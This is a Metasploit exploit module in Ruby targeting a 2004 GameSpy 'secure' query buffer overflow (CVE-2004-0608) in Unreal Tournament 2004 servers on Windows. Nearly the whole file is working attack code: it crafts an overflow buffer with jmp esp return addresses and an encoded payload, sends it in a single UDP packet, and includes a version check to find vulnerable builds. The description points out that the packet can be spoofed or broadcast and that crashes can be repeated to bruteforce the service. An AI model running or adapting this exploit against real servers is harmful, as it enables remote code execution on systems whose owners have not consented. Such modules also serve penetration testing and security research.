1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
16
        'Description' => %q{
17
          This is an exploit for the GameSpy secure query in
18
          the Unreal Engine.
19

20
          This exploit only requires one UDP packet, which can
21
          be both spoofed and sent to a broadcast address.
22
          Usually, the GameSpy query server listens on port 7787,
23
          but you can manually specify the port as well.
24

25
          The RunServer.sh script will automatically restart the
26
          server upon a crash, giving us the ability to
27
          bruteforce the service and exploit it multiple
28
          times.
29
        },
30
        'Author' => [ 'stinko' ],
31
        'License' => BSD_LICENSE,
32
        'References' => [
33
          [ 'CVE', '2004-0608'],
34
          [ 'OSVDB', '7217'],
35
          [ 'BID', '10570'],
36

37
        ],
38
        'Privileged' => true,
39
        'Payload' => {
40
          'Space' => 512,
41
          'BadChars' => "\x5c\x00",
42
        },
43
        'Platform' => 'win',
44
        'Targets' => [
45
          ['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
46
        ],
47
        'DisclosureDate' => '2004-06-18',
48
        'DefaultTarget' => 0,
49
        'Notes' => {
50
          'Reliability' => UNKNOWN_RELIABILITY,
51
          'Stability' => UNKNOWN_STABILITY,
52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
53
        }
54
      )
55
    )
56

57
    register_options(
58
      [
59
        Opt::RPORT(7787)
60
      ]
61
    )
62
  end
63

64
  def exploit
65
    connect_udp
66

67
    buf = make_nops(1024)
68
    buf[0, 60] = [target['Rets'][0]].pack('V') * 15
69
    buf[54, 4] = [target['Rets'][1]].pack('V')
70
    buf[0, 8] = "\\secure\\"
71
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
72

73
    udp_sock.put(buf)
74

75
    handler
76
    disconnect_udp
77
  end
78

79
  def ut_version
80
    connect_udp
81
    udp_sock.put("\\basic\\")
82
    res = udp_sock.recvfrom(8192)
83
    disconnect_udp
84

85
    if (res and (m = res.match(/\\gamever\\([0-9]{1,5})/)))
86
      return m[1]
87
    end
88

89
    return
90
  end
91

92
  def check
93
    vers = ut_version
94

95
    if (not vers)
96
      print_status("Could not detect Unreal Tournament Server")
97
      return
98
    end
99

100
    vprint_status("Detected Unreal Tournament Server Version: #{vers}")
101
    if (vers =~ /^(3120|3186|3204)$/)
102
      vprint_status("This system appears to be exploitable")
103
      return Exploit::CheckCode::Appears
104
    end
105

106
    if (vers =~ /^(2...)$/)
107
      vprint_status("This system appears to be running UT2003")
108
      return Exploit::CheckCode::Detected
109
    end
110

111
    vprint_status("This system appears to be patched")
112
    return Exploit::CheckCode::Safe
113
  end
114
end
115

116